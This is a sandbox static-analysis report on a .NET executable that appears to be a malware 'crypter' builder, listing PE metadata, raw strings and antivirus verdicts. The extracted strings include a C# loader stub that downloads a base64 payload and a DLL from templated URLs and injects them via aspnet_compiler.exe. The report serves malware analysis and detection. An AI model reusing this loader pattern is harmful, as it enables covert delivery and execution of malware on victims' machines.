Static | ZeroBOX

PE Compile Time

2022-05-23 07:39:59

PDB Path

c:\Users\VICTOR\source\repos\new_project\new_project\obj\Debug\new_project.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00030cf4 0x00030e00 7.7728160924
.rsrc 0x00034000 0x00004820 0x00004a00 4.88316746411
.reloc 0x0003a000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x000343f0 0x00004228 LANG_NEUTRAL SUBLANG_NEUTRAL dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON 0x00038618 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x00034130 0x000002c0 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x00038630 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
.+s.
.qs.
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
hSystem.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3afSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aPADPADPBj
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Bitmap
, #&')*)
-0-(0%()(
((((((((((((((((((((((((((((((((((((((((((((((((((
3B$4RC
*&kQq-+%{
&[BeD0
h8(LJXB
5,E13IP
E":CE!,
\I]$TM
2K+62|
JvRfv;
#D%Z)v
3]$5e,
E$RFmjDt
XT&14Vl&
)"QfWE
)`UR)v!
Ti$IbX
hd&;DnU2[
DSCBEv
B-pJ(m
%4NDJ-
4Ih$U`i
CTP'LvK
eBaLcCf
5!Q@4ed.
CRFK#L
[e,v cHd
DnCQ)G
rDJ%n4\
c:eE8
6KeJb`HJl@
p:3kR$(ucH
V,c$g.Me
fsVtV2g$V,b
ZE0(Lm,KVKE
TH-25+H
.<PP#5
,jU&4F
eL:Mz|
ITRCf
jBhj%(
Ha6VKC
HQ-,pf
RbA!,2
Vi>D6&X
CBE"4h
Wt6HEw
HbE"6Hh
4HYSk)Q
cO$n]6
"cby+6
Wphm,A/
BE"400T+"
V4m}^8
huhN~k
4-$R)pJ-
4hvgcLX
ijFNI\Z
EK@10eC
R3kr)]
6J%$Th
ck!EOHh
Tg$k$A
&a>M'.L
rg#&i"
VlK&\{"
>__q-m]MG
Ar"B1E
by)!QJ
n]4R)3
6HKLh@)
.G@ c`
Z8=OA}
7z+[BQif
rwM>G[
nQj9K.
k$>y*X3v
,2M$e,
&6&Vm!0
&GAc%/% Hc
:4}G[I
gd}KCS
&K6~co
7v'u|Q
Z}7fmd
L2)Ew5k
~Ngi:&
<=F|7x
>Nxv]?A
d3"zr\cE(
o*Zi$tN+
djseE/M
;^yqq^
N3U'_S
-%DFi<
uOR1Yk
BcHo#H
5QIpRK
e4CACH
_MZmSy
J]7xt~
4Jiy-%D
2to$e5
Bad41X
nOM5e)f\
_n-xF1
[3x;5e
6 LaEb
-u'r5z
TVVJ'=
R7}-a#9*
^M#utDc
=cAkzn
%vR%`v/
Qj#D]1i
;8G?3-~&3
7\!a*zX
EiF)[Y4}/
^[:T-5FN
E)y2O%
Iy%;)#.
OG_Uhh7
mY:i>Y
d51HRuu
O9>W/[
w5G)4F
YFI^,7z
=KO&*t
n+,]n^I
iBK)~E
8a:5Sw
R/SJ)?
CCK41k:4i
UDjM&\
=-9GONJ
ZgMa{
O%*\rsGq
u}3R/<?
/p LlDRb
90z>HlvK
fj/R_Q}
jT]~&>
fZi~A?
?[ZZnP
[WF_fr
)NM,rjc
v*}IRk
o6oN]QO
mjm)6m
2TrFY5
X8jJ-p
GQVY|"
iSVg=F
V=g&/u
Fu,rtORT
b*9`{>
CxV!X6
"_ 4O|
J* SI
'2NRMv4v
EIONi4x
IKCq\4
e-Ey7lfB
{h.d=Y%s(
8(sVvzm|
J+MRIQz
Cb*h11
Y|%k)
QYm"ZI
h-9FI`T
Vmg%zN
IKE;X;
;eN1\$]m
xdIZ4pJ
DjB) H
Sn\|yg
K'|6;x
JHUEDrCF
mwJPwm~f
.OKm5-
K[BR_y/
sJNYfj=/%
f3O'&w;
Z@7#9I
&R{z+Wo
D4VkfK
#atc%YB
)$$RDt
I]p}BT
ZoSZRlq
uZP#Fn+&KQ
#KVI^;
OQvf.M
GOS+'N
O "ZVKy
XH(tR\
GQ-]6S
i1*W7K|
+,6@2j
qONPu%
_O6\yc
hCBDhK
i25 Ht4
FmnAAC
FLJFkP
yCKF)W8>
uu{'ve
2l]Ll]
3J_sY?
lE_-"a
i#[gM!wH
(/c<wx
%RM?q3
24vZzy
bWT2Z-
%&4m]Y-32
]a]z|-
?2=_g-
/MKVj/
5+DR">J
2\P.KD
p/J=rIw
ihAfRK
LIu*Aw
l~Z:_7p
=_wrZ:N
iJYfry
=#WNZsji
<mXKNn2YN
ht%VQ+I`6
k&e!VV
v{J@_O
6"e,02
IvY>[_GSFn:
zIe,CB)
WbYc)b
&Rd}9)Y,jV
:Ab*+4
bIe2$X
++E&JeG
,X),pOK
KN:qIt
iJ,y<5
tU*'%
yf[yuh
WhRCXC^
4ed4Z!pZ
\Uw)/`K92
#]4tF&:h
g$nW+4
B[}iBJ
Je",R-
9>rzJ<P
mutgMJ
/RM{+g
|RFT}Y_
3iw#V1
.<#4\Y
!)>EE1
YWadYH
gZn-YI
tmu:5Q
7Tj9eY
oRrkKS
KD3FK,f
R#ArP%
3)365*
i]Pnw:
--]'yR
pm?f{;
~WHhTi$Aef
VRfq~F
Y5+6x|?
Vl!4P1
()*i~`
MQo[M%
\a#HrK
:}Gq-}
GYG_GSJi5(
**T2$i"Z5+
}+&qRU$
HcBCCf
#K!E]x
3fhnDYt
_})~i3
6V"6qTf
ZR"E2$V
kM9ONJPyG
,h!Q,
imScO(
o&lvkN}
VlCO"~
+"{K<9
$ZFmnD
WVLS)H
c5"(L3R
c9&KX5"E
pe$k36i
tz7=I*g
Lgm>r>
=fNVKy,
MiuiN/
y9a#e4b
}#Hm&$
rWLZv
k>wy'-y7
6jG;tR
%dk$Xc
-!$ZFmnC
MVy>cc.
_7OV1u
2_6j"El
+N.sQF
(:]M[<
Y$Q}#&
R&Hm{|"
'%`2YO
i-!66
e#Vg#Q
`E"KAT
w4jR95^pu
*-r**(
FStY2VX
E"Qq#P
/!E2QJ
:MW)5J
#RV-SfnV6
Ic522}
rg#Nv3b
ZfkqHbC#A
Qx%+To8
]zq;7
y5Mw1E
IM`I1)`M
)"%#R3rWP
@RDnCC
CBE"7!
~}q5FQ5,Q
,jSCBH
l2Gb,@+
XY2a-Kh
"_%+%j-2
Z^IV*+(
$\yFkx
2FrTm3)
j>M:rWIv
0`EOa
`TYQ%"
COF<u$
:nU6Ky
$*)&\VB
tGq)psJ
QIpk&k
"Z\2YO&r
IZ&R!1
_~x~>?u
3lRad_
`)"K$DK
E"Q^EX
"c$vN<
9P6KfnF
J*&mjU
>s^}NM
"ZFq5Fk
OQKUf{
Q`&&jFm&+
ON_{N2w
2eJFrgI
qeY)!5N
$T>Ivi%Fr5/
-]YN_y
,e$g#Y
VrF3Y6
-=9J1J
jf]Br5
bCDt\YQ"<
&\VQ+P
O83lrdI
Pu#:nV
E!IUED
2-x3cx
??SSy8
L%#7#R9
ilveeX%ia~
We&BcO#MJ
-?&]%Z*<
m$C^K+6"
f6;flt
aJVCc|
lvSfQ%
2LvM72k
RbNyT
`gMmq~J
jG+S7n
Fk6&[%
)rTy!2
]3kG r
Kb`&]1i5o#Q^
9F-re>
E"pTrF
,*dg#V
-34RdjU
,%kc3\X
=CKr_VE
Q#dXbabaR
<r,I["
y)H72l4f
Rfr*Fo
C+42X6L
!Y6Vmih
y.21Lh
r_VyE){
Fs.tK,c&/
4(bC!!X
D.KFkqE!"
YbSa$W
i?a}G`Y
L%&&2K
Tx3]%7
v;dXX]
c'#Ihb- hl
ED4V4*
\`jY2M
M52Xv%
Egz92[
v'~Ixa6m
Q` YCE0
j4T4B-
Cbb3a10a
d6L\ %
6'#R3r6
CD%40J
[!kG"z
CBE",8
52k`Lk
`J_RZ
t.9)3(
at&jF-&
6rhV!XKT
2YdKUb
2,6v+b
%r%c*(
ZfcL5+E,
tE!$Q/
&6IbPM
&Rfy)1a*
IWc q#[R
#@gjLV6"
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
^df8KOQ
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADPU8y|
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Net;
using System.Runtime.InteropServices;
namespace %a%
static class %b%
/// <summary>
/// The main entry point for the application.
/// </summary>
[STAThread]
static void Main()
{
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls
| SecurityProtocolType.Tls11
| SecurityProtocolType.Tls12
| SecurityProtocolType.Ssl3;
string %c% = "%BASE%";
HttpWebRequest %d% = (HttpWebRequest)WebRequest.Create(%c%);
%d%.Method = "GET";
WebResponse %e% = %d%.GetResponse();
StreamReader %f% = new StreamReader(%e%.GetResponseStream(), System.Text.Encoding.UTF8);
string %g% = %f%.ReadToEnd();
string %h% = (%g%);
byte[] %i% = Convert.FromBase64String(%h%);
Assembly %j% = Assembly.Load(%l%());
object %k% = new object[] { @"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", string.Empty, %i%, true };
%j%.GetType("THEDEVIL.DEVILDEVIL").InvokeMember("RUNNER", BindingFlags.InvokeMethod, null, null, (object[])%k%);
}
public static byte[] %l%()
{
string %m% = "%DLL%";
HttpWebRequest %n% = (HttpWebRequest)WebRequest.Create(%m%);
%n%.Method = "GET";
WebResponse %o% = %n%.GetResponse();
StreamReader %p% = new StreamReader(%o%.GetResponseStream(), System.Text.Encoding.UTF8);
string %q% = %p%.ReadToEnd();
return (Convert.FromBase64String(%q%));
}
v4.0.30319
#Strings
<Module>
new_project.exe
new_project
Helper
Program
Resources
new_project.Properties
Settings
System.Windows.Forms
mscorlib
System
Object
System.Configuration
ApplicationSettingsBase
EventArgs
button3_Click
button2_Click
button1_Click
System.ComponentModel
IContainer
components
Dispose
InitializeComponent
TextBox
textBox1
textBox2
Button
button1
button2
button3
textBox3
Random
Randomi
System.Resources
ResourceManager
resourceMan
System.Globalization
CultureInfo
resourceCulture
get_ResourceManager
get_Culture
set_Culture
get_stub
Culture
defaultInstance
get_Default
Default
sender
disposing
lenght
System.Runtime.Versioning
TargetFrameworkAttribute
System.Reflection
AssemblyTitleAttribute
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyCultureAttribute
System.Runtime.InteropServices
ComVisibleAttribute
GuidAttribute
AssemblyVersionAttribute
AssemblyFileVersionAttribute
System.Diagnostics
DebuggableAttribute
DebuggingModes
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
OpenFileDialog
FileDialog
set_Filter
Environment
SpecialFolder
GetFolderPath
set_InitialDirectory
CommonDialog
DialogResult
ShowDialog
get_FileName
Control
set_Text
SaveFileDialog
set_FileName
String
Replace
get_Text
System.IO
WriteAllText
MessageBox
Concat
ReadAllBytes
Convert
ToBase64String
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
ComponentResourceManager
SuspendLayout
System.Drawing
get_Black
set_BackColor
get_Red
set_ForeColor
set_Location
set_Name
set_Size
set_TabIndex
FontStyle
GraphicsUnit
set_Font
ButtonBase
set_UseVisualStyleBackColor
EventHandler
add_Click
ContainerControl
set_AutoScaleDimensions
AutoScaleMode
set_AutoScaleMode
GetObject
set_BackgroundImage
ImageLayout
set_BackgroundImageLayout
set_ClientSize
ControlCollection
get_Controls
set_Icon
ResumeLayout
PerformLayout
System.Text
StringBuilder
get_Length
Substring
Append
ToString
.cctor
STAThreadAttribute
Application
EnableVisualStyles
SetCompatibleTextRenderingDefault
System.CodeDom.Compiler
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
CompilerGeneratedAttribute
ReferenceEquals
Assembly
get_Assembly
GetString
EditorBrowsableAttribute
EditorBrowsableState
SettingsBase
Synchronized
new_project.Form1.resources
new_project.Properties.Resources.resources
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.5
new_project
Copyright
2022
$3e94ce9e-c760-40f0-b415-d294f9211de4
1.0.0.0
WrapNonExceptionThrows
RSDSLq[lJ:
c:\Users\VICTOR\source\repos\new_project\new_project\obj\Debug\new_project.pdb
_CorExeMain
mscoree.dll
^df8KOQ
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
$this.BackgroundImage
$this.Icon
Executable (*.exe)|*.exe
Program.cs
%BASE%
\BASE64.txt
textBox1
textBox2
Microsoft Sans Serif
button1
convert
button2
generate
button3
textBox3
$this.BackgroundImage
$this.Icon
new_crypter
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
new_project.Properties.Resources
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
new_project
FileVersion
1.0.0.0
InternalName
new_project.exe
LegalCopyright
Copyright
2022
OriginalFilename
new_project.exe
ProductName
new_project
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav Clean
Lionic Clean
Elastic Clean
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
Cybereason Clean
BitDefenderTheta Clean
VirIT Clean
Cyren Clean
Symantec Clean
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
Cynet Malicious (score: 100)
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
Ad-Aware Clean
TACHYON Clean
Sophos Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
Trapmine Clean
FireEye Clean
Emsisoft Clean
Ikarus Clean
Jiangmin Clean
Webroot Clean
Avira Clean
Antiy-AVL Clean
Microsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
GData Clean
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
DeepInstinct MALICIOUS
VBA32 Clean
Cylance Clean
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
AVG Clean
Avast Clean
CrowdStrike win/malicious_confidence_70% (W)
No IRMA results available.